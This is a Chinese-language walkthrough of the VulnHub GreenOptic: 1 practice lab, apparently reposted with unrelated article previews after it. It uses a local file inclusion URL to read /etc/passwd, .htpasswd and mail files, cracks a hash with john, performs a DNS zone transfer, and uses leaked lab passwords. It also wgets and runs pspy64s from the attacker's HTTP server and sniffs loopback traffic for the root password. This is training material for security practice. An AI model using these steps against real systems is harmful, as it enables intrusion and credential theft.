靶场练习第十九天~vulnhub靶场之GreenOptic: 1

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接:GreenOptic: 1 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -A -sV 192.168.101.123

2.网站的信息收集

(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息

貌似没有什么信息

(2)靶机开放了10000端口,在浏览器中查看一下是否存在有用的信息

发现可能是dns域名解析的问题访问不到http://192.168.101.123:1000,在/etc/hosts文件添加如下信息

192.168.101.123 websrv01.greenoptic.vm

修改完成后,点击刚才页面提示的那个网站

随即进入到登录界面

暂时不知账号密码,先放一放

(3)dirb扫描网站的登录界面

dirb http://192.168.101.123

浏览器登录http://192.168.101.123/account,发现了一个登录界面

虽然没有账号密码登录,但是发现了url可能存在文件包含

http://192.168.101.123/account/index.php?include=/etc/passwd

如上图所示,创建一个文件将这些用户名收集起来,将筛选出来的用户放到username里面

vim user

cat user | grep /bin/bash

vim username

dnsenum --dnsserver 192.168.101.123 --enum greenoptic.vm

(4)找到了另一个域名,设置hosts后访问。发现需要账号密码

dig @192.168.101.123 greenoptic.vm axfr

在/etc/hosts 添加recoveryplan.greenoptic.vm域名

(5)发现一个加密的密码

在view-source:http://192.168.101.123/account/index.php?include=/var/www/.htpasswd一个密码

staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.

(6)用john进行md5解密

cp password password.dc

john --wordlist=/usr/share/wordlists/rockyou.txt password.dc

(7)成功登录http://recoveryplan.greenoptic.vm/

用刚才获取到用户密码登录http://recoveryplan.greenoptic.vm/

进入到key information, 按照提示利用本地文件包含去读terry-/var/mail/terry和sam-/var/mail/sam的邮件,同时下载dpi.zip。 下载好dpi.zip后解压它

cd /下载

unzip dpi.zip

发现解压时需要密码,提示说以邮件形式发送

查看邮件

view-source:http://192.168.101.123/account/index.php?include=/var/mail/sam

利用HelloSunshine123密码解压得出dpi.pcap文件

(7)wireshark流量分析

使用wireshark对dpi.pcap文件进行流量分析

wireshark

1.选择要分析的文件

2.分析

点击统计里面的conversation

tcp流量是当中最多的,可能存在信息

3.找到一组账号密码

alex:FwejAASD1

利用刚才得到用户密码,ssh远程登录

ssh alex@192.168.101.123

3.获取shell

三、漏洞的发现与利用

1.pspy64s监听进程

(1)下载好pspy64s工具到/var/www/html下面

cd /var/www/html

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

将pspy64s工具下载到靶机上

(2)在kali开启一个Http服务

python -m SimpleHTTPServer

(3)远程用户alex下载pspy64s工具

wget 192.168.101.10:8000/pspy64s

(4)提升pspy64s权限

chmod 777 pspy64s

ls -l

(5)启动pspy64s查看进程,寻找可以利用的漏洞

./pspy64s

2.通过流量包分析

用户alex文件夹下有一个wireshark文件夹,同时还发现alex属于wireshark用户组

ls -all

cat /etc/group|grep wireshark

使用dumpcap抓取本地环回地址包一段时间,下载到本地使用wireshark解析。

dumpcap -w test.pcap -i lo

一段时间后ctrl+c退出

将流量包下载到kali上

在靶机

cp test.pcap /tmp/

在kali

scp alex@192.168.101.123:/tmp/test.pcap ./

wireshark

发现有Auth包,base64解码得到了root用户口令ASfojoj2eozxczzmedlmedASASDKoj3o

拿下flag

cd /root

cat root.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375024.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

靶场练习第二十五天~vulnhub靶场之Raven-2

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的…

每天一个linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics(虚拟内存统计)的缩写,可对操作系统的虚拟内存、进程、CPU活动进行监控。他是对系统的整体情况进行统计,不足之处是无法对某个进程进行深入分析。vmstat 工具提供了一种低开销的系统性能观察方…

用TypeScript开发了一个网页游戏引擎,开放源代码

最开始学习电脑编程的原动力之一就是想自己编写游戏,一方面很好奇这些游戏是怎么做出来的,另一方面觉得有些地方设计的不合理,希望电脑游戏既能让人玩的有趣,又不浪费时间。 学校五年,毕业十年,学用了十多种…

靶场练习第二十一天~vulnhub靶场之Momentum-1

一、环境搭建 1.ifconfig查看kali的ip 2.创建靶机 靶机下载地址:Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 寻找靶机ip:nmap 192.168.101.0/24 2.端口扫描 使用命令:nmap -A -T4 -p 1-65535 192.168.101.113,发现开放2…

为集合排序的三个方法

// 为集合字符串排序(cmpare:) // - null :空类型 就是字符型的0; // - [NSNull null]是对象类型,能够存入集合的数据:为其分配了内存,但其中的值为空(不能被排序否则程序会崩溃&am…

C#ArrayList对象集合

ArrayList alist new ArrayList();//集合对像 长度可以改变,类型不限//添加单个元素可以Add()alist.Add("在在的");alist.Add(35);alist.Add(3.14);alist.Add(c);alist.Add(5000m);//如果用Add()添加数组或集合最好用 alist.AddRange()alist.AddRange(…

靶场练习第二十二天~vulnhub靶场之Momentum-2

一、准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议:nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster,寻找隐藏的网站 gobuster di…

索引深入浅出(8/10):覆盖索引或列包含

在索引深入浅出:非聚集索引的B树结构在聚集表里,在聚集表里,我们看到非聚集索引的叶子层只包含非聚集索引键和聚集索引键。从聚集表结构或堆表结构里拿到剩下列,SQL Server需要进行书签/键查找操作。很多情况下书签或键查找非常消…

靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机…

Spring事务报Connection is read-only

昨天做项目时,写了个方法,程序突然报了Connection is readonly. Queries leading to data modification are not allowed调了程序半天,最后才发现是自己在spring配置文件中增加了事务.把方法写成了大写开头了,但是spring配置是以小写开头 代码…

HTTP协议具体解释

HTTP是一个属于应用层的面向对象的协议。因为其简捷、高速的方式。适用于分布式超媒体信息系统。它于1990年提出,经过几年的使用与发展,得到不断地完好和扩展。眼下在WWW中使用的是HTTP/1.0的第六版,HTTP/1.1的规范化工作正在进行之中&#x…

靶场练习第二十四天~vulnhub靶场之Raven-1

一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的…

【知识积累】DES算法之C#加密Java解密

一、前言 在项目需要添加安全模块,客户端调用服务端发布的service必须要经过验证,加密算法采用DES,客户端采用C#进行加密,服务端使用Java进行解密。废话不多说,直接上代码。 二、客户端 客户端采用C#进行开发&#xff…

Space.js – HTML 驱动的页面 3D 滚动效果

为了让我们的信息能够有效地沟通,我们需要创建用户和我们的媒体之间的强有力的联系。今天我们就来探讨在网络上呈现故事的新方法,并为此创造了一个开源和免费使用的 JavaScript 库称为 space.js。该库是 HTML 驱动的,这意味着你不需要在网站上…

离职感言-Symbio的5年工作回顾和总结(转载)

离职感言-Symbio的5年工作回顾和总结 (2011-06-02 21:06:30) 转载▼2005年底,当时我在西安过的还不错,结了婚,买了房,在公司也受老板器重,但是初为人父,孩子带给我的那种人生紧迫感:“再不趁还…

64位CentOS6.2安装erlang及rabbitmqServer

CentOS 6.2 64bit 安装erlang及RabbitMQ Server 1、操作系统环境(CentOS 6.2 64bit) 1 [rootHAproxy ~]# cat /etc/issue2 3 CentOS release 6.2 (Final)4 Kernel \r on an \m5 [rootHAproxy ~]# cat /proc/cpuinfo |grep "clflush size"6 clflush size : 647 clf…

Kafka的Producer和Consumer源码学习

先解释下两个概念: high watermark (HW) 它表示已经被commited的最后一个message offset(所谓commited, 应该是ISR中所有replica都已写入),HW以下的消息都已被ISR中各个replica同步,从而保持一致。HW以上的消息可能是脏数据:部分r…

for+next()实现数组的遍历及while list each 的使用

//要求使用for循环语句来完成该数组的遍历//输出每一项的键名和对应值&#xff1a; $a array( a > 34, 5 > 51, 13, 32, bb>15, 2 > 31 ); $len count($a); for($i0;$i<$len;$i)…

读Pyqt4教程,带你入门Pyqt4 _005

对话框窗体或对话框是现代GUI应用不可或缺的一部分。dialog定义为两个或多个人之间的交谈。在计算机程序中dialog是一个窗体&#xff0c;用来和程序“交谈”。对话框用来输入数据、修改数据、改变程序设置等等。对话框是用户和计算机程序沟通的重要手段。 QColorDialog 颜色对话…

Linux内核的启动过程分析

秦鼎涛 《Linux内核分析》MOOC课程http://mooc.study.163.com/course/USTC-1000029000  一、实验目的及要求&#xff1a; 使用gdb跟踪调试内核从start_kernel到init进程启动 详细分析从start_kernel到init进程启动的过程并结合实验截图撰写一篇署名博客&#xff0c;并在博客文…